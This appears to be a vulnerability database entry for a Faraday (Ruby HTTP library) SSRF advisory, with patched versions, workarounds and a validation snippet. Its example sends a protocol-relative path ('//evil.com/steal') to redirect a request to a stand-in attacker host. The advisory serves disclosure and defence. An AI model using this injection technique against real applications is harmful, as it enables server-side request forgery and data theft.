VDB
KO
MEDIUM 5.8

GHSA-33mh-2634-fwr2

Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Details

### Impact

Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`) uses Ruby's `URI#merge` to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. `//evil.com/path`) are treated as network-path references that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's `get()`, `post()`, `build_url()`, or other request methods, an attacker can supply a protocol-relative URL like `//attacker.com/endpoint` to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF).

The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with `/`, so protocol-relative URLs bypass it entirely.

**Example:** ```ruby conn = Faraday.new(url: 'https://api.internal.com') conn.get('//evil.com/steal') # Request is sent to https://evil.com/steal instead of api.internal.com ```

### Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

### Workarounds

**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.**

Applications should validate and sanitize any user-controlled input before passing it to Faraday request methods. Specifically:

- Reject or strip input that starts with // followed by a non-/ character - Use an allowlist of permitted path prefixes - Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation: ```ruby def safe_path(user_input) raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]}) user_input end ```

Are you affected?

Enter the version of the package you're using.

Affected packages

RubyGems / faraday
Introduced in: 2.0.0 Fixed in: 2.14.1
Fix bundle update faraday
RubyGems / faraday
Introduced in: 1.0.0 Fixed in: 1.10.5
Fix bundle update faraday

References